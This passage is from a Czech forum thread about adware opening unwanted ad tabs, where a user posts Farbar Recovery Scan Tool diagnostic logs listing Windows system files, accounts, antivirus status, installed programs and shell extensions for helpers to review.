2020-08-12 19:44 - 2020-08-12 19:44 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acwow64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuthKeyDelegate_From_20190529_To_20200303.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuth1KeyDelegate.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-08-12 19:35 - 2020-07-18 05:07 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-08-12 19:35 - 2020-07-18 04:53 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 18:07 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-11 17:54 - 2020-03-20 23:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-09-11 16:45 - 2020-03-21 08:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-09-11 16:45 - 2020-03-21 08:08 - 000000000 ____D C:\Program Files (x86)\Java
2020-09-11 16:42 - 2020-03-21 08:09 - 000166056 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2020-09-11 16:41 - 2020-03-20 23:29 - 001694640 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-11 16:41 - 2019-03-19 13:55 - 000717182 _____ C:\WINDOWS\system32\perfh005.dat
2020-09-11 16:41 - 2019-03-19 13:55 - 000145262 _____ C:\WINDOWS\system32\perfc005.dat
2020-09-11 16:41 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-09-11 16:38 - 2020-03-20 23:49 - 000000000 ____D C:\Users\Milan\AppData\LocalLow\Mozilla
2020-09-11 16:35 - 2020-03-20 23:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-09-11 16:35 - 2019-03-19 06:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-09-11 16:34 - 2020-04-06 21:57 - 000006622 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-09-11 16:34 - 2020-03-20 23:40 - 000015548 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-09-11 16:34 - 2020-03-20 23:40 - 000013406 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-09-11 07:15 - 2020-04-05 22:19 - 000006107 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-09-11 06:46 - 2020-03-21 10:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2020-09-10 20:41 - 2020-04-04 23:09 - 000006115 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-09-10 16:40 - 2020-06-07 10:48 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-09-10 16:40 - 2020-06-07 10:48 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-09-10 08:02 - 2020-04-04 00:12 - 000006119 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-09-10 07:43 - 2020-05-31 14:59 - 000002178 _____ C:\Users\Milan\Desktop\JDownloader 2.lnk
2020-09-10 07:43 - 2020-03-28 17:28 - 000000958 _____ C:\Users\Milan\Desktop\Mockba to Berlin.lnk
2020-09-10 07:43 - 2020-03-21 14:38 - 000001080 _____ C:\Users\Milan\Desktop\SpeedFan.lnk
2020-09-09 20:32 - 2020-04-05 15:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\vlc
2020-09-09 20:32 - 2020-04-03 11:51 - 000006111 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-09-09 08:42 - 2020-04-03 00:55 - 000006106 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-09-09 07:58 - 2020-07-17 10:20 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka
2020-09-08 19:55 - 2020-03-27 09:09 - 000006118 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-09-08 16:01 - 2020-03-30 11:51 - 000004612 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-09-08 16:01 - 2019-03-19 06:56 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-08 16:01 - 2019-03-19 06:56 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-09-08 08:24 - 2020-03-26 21:15 - 000006110 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-09-07 20:23 - 2020-03-26 08:49 - 000006102 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-09-07 07:56 - 2020-03-21 12:54 - 000006102 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-09-06 16:33 - 2020-03-21 12:43 - 000006098 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-09-04 20:52 - 2020-03-21 10:01 - 000006118 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-09-04 20:28 - 2020-08-08 11:31 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (2)
2020-09-03 20:48 - 2020-03-20 23:40 - 000006106 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-09-02 20:13 - 2020-03-21 00:32 - 000003697 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-09-02 20:04 - 2020-03-20 23:49 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-09-02 20:01 - 2020-03-20 23:49 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-08-29 22:38 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-08-29 22:34 - 2020-03-20 23:30 - 000000000 ____D C:\Users\Milan
2020-08-29 18:15 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-29 18:14 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-08-29 17:33 - 2020-04-14 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Castlevania - The New Generation
2020-08-28 10:06 - 2020-06-07 10:48 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-28 10:06 - 2020-06-07 10:48 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-27 23:32 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-08-26 11:40 - 2020-03-20 23:34 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1738925715-1269715944-3180472622-1001
2020-08-26 11:40 - 2020-03-20 23:34 - 000000000 ___RD C:\Users\Milan\OneDrive
2020-08-26 11:40 - 2020-03-20 23:30 - 000002365 _____ C:\Users\Milan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-26 00:51 - 2020-04-11 00:56 - 000005712 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-08-25 12:48 - 2020-04-09 21:49 - 000006093 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-08-25 01:07 - 2020-04-08 22:17 - 000006094 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-08-24 12:54 - 2020-04-07 21:57 - 000006093 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-08-15 14:23 - 2020-08-08 20:33 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (3)
2020-08-15 08:06 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-08-12 21:39 - 2020-03-20 23:31 - 000000000 ___RD C:\Users\Milan\3D Objects
2020-08-12 21:39 - 2020-03-20 23:18 - 000353328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-08-12 21:37 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-08-12 21:37 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\servicing

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

martybx
Návštěvník
Návštěvník
Příspěvky: 154
Registrován: 26 úno 2007 16:22
Kontaktovat uživatele:

Re: neustale vyskakuji zalozky s reklamou

#6 Příspěvek od martybx »

a zde:

Kód: Vybrat vše

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 09-09-2020
Ran by Milan (11-09-2020 18:10:32)
Running from C:\Users\Milan\Desktop
Windows 10 Home Version 1909 18363.1016 (X64) (2020-03-20 21:25:00)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1738925715-1269715944-3180472622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1738925715-1269715944-3180472622-503 - Limited - Disabled)
Guest (S-1-5-21-1738925715-1269715944-3180472622-501 - Limited - Disabled)
Milan (S-1-5-21-1738925715-1269715944-3180472622-1001 - Administrator - Enabled) => C:\Users\Milan
WDAGUtilityAccount (S-1-5-21-1738925715-1269715944-3180472622-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.433 - Adobe)
AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.0.7 - philandro Software GmbH)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.6.3135 - AVG Technologies)
AVG Secure Browser (HKLM-x32\...\AVG Secure Browser) (Version: 85.0.5675.85 - Autoři prohlížeče AVG Secure Browser)
AVG Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1066.0 - AVG Technologies) Hidden
Car Mechanic Simulator 2018 Mercedes Benz (HKLM-x32\...\Car Mechanic Simulator 2018 Mercedes Benz_is1) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
DAEMON Tools Ultra (HKLM\...\DAEMON Tools Ultra) (Version: 5.4.1.0928 - Disc Soft Ltd)
Dark Konflict (HKLM-x32\...\Dark Konflict) (Version:  - )
Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform)
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{D2D9559D-359A-4C61-B93A-FE01AE2BFB75}) (Version: 4.5.4 - Seiko Epson Corporation)
EpsonNet Print (HKLM\...\{96ED1D58-440C-4345-8FEE-C4781366C67F}) (Version: 3.1.4.0 - SEIKO EPSON Corporation)
Euro Truck Simulator 2 v1.35.3.4S (HKLM-x32\...\tuttop.com Euro Truck Simulator 2 v1.35.3.4S_is1) (Version: 1.35.3.4S - tuttop.com)
HELLGATE London (HKLM-x32\...\HELLGATE London_is1) (Version:  - )
Java 8 Update 261 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.51 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mockba to Berlin (HKLM-x32\...\{BCECC8FA-31AD-487A-A8C4-1C9C5454F9C6}_is1) (Version: 2.17 - US - ACTION, s.r.o.)
Mozilla Firefox 80.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 80.0.1 (x64 cs)) (Version: 80.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 69.0 - Mozilla)
NVIDIA Ovladače grafiky 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}) (Version: 9.10.0514 - NVIDIA Corporation)
Odinstalace tiskárny EPSON L3150 Series (HKLM\...\EPSON L3150 Series) (Version:  - Seiko Epson Corporation)
Original War (HKLM-x32\...\Original War) (Version:  - )
Příručky společnosti EPSON (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.56.1.0 - Seiko Epson Corporation)
S.T.A.L.K.E.R. Clear Sky (HKLM-x32\...\GOGPACKSTALKERSTCS_is1) (Version: 2.0.0.8 - GOG.com)
Siegecraft Commander (HKLM-x32\...\Siegecraft Commander_is1) (Version:  - )
Skype verze 8.64 (HKLM-x32\...\Skype_is1) (Version: 8.64 - Skype Technologies S.A.)
Sniper Elite (HKLM-x32\...\{2527736B-927C-4E5F-A861-6BA616568B80}_is1) (Version: 1.0 - US - ACTION, s.r.o.)
Sorades - Die Befreiung (HKLM-x32\...\Sorades - Die Befreiung) (Version: 1.0 - diebefreiung.de)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spintires Chernobyl (HKLM-x32\...\Spintires Chernobyl_is1) (Version:  - )
Splitter 9.6.0.1 (HKLM-x32\...\WAV MP3 Splitter_is1) (Version: 9.6.0.1 - Piston Software)
Surviving Mars (HKLM-x32\...\Surviving Mars_is1) (Version:  - )
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.5.0 - TeamSpeak Systems GmbH)
The Colonists (HKLM-x32\...\1282350952_is1) (Version: V1 - GOG.com)
The Sinking City (HKLM-x32\...\The Sinking City_is1) (Version: 0.0.0 - THE KNIGHT)
The Subject (HKLM-x32\...\The Subject_is1) (Version:  - )
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Train Valley 2 Passenger Flow (HKLM-x32\...\Train Valley 2 Passenger Flow_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.12.4.0_x86__kgqvnymyfvs32 [2020-08-29] (king.com)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Studios) [MS Ad]
MSN Počasí -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-29] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.958.0_x64__56jybvy8sckqj [2020-08-29] (NVIDIA Corp.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveUltra] -> {F0E53CA3-02F8-40AE-9470-309F0309036F} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers3: [DaemonShellExtImageUltra] -> {B5EBA666-2B94-4C7A-9CAA-A4539F329646} => C:\Program Files\DAEMON Tools Ultra\DTShl64.dll [2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\nvshext.dll [2019-10-04] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd -> Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2020-03-21 10:40 - 2020-09-08 18:46 - 002072064 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 000310784 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2020-03-21 10:40 - 2020-09-08 18:46 - 006903808 _____ () [File not signed] C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2020-08-15 08:36 - 2020-08-15 08:36 - 003230720 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DotNetCommon\1ff547e9235b59188e9fe052625211ac\DotNetCommon.ni.dll
2018-11-29 14:21 - 2018-12-18 09:48 - 006142320 _____ (AVB Disc Soft, SIA -> Disc Soft Ltd) [File not signed] C:\Program Files\DAEMON Tools Ultra\engine.dll
2020-08-15 08:35 - 2020-08-15 08:35 - 004807680 _____ (Disc Soft Ltd) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_64\DiscSoft.NET.Common\5eaf8b2270226ec230b3f2ddb6c2aeb0\DiscSoft.NET.Common.ni.dll
2016-09-14 14:31 - 2016-09-14 14:31 - 000500736 ____S (SEIKO EPSON CORPORATION) [File not signed] C:\WINDOWS\System32\enppmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

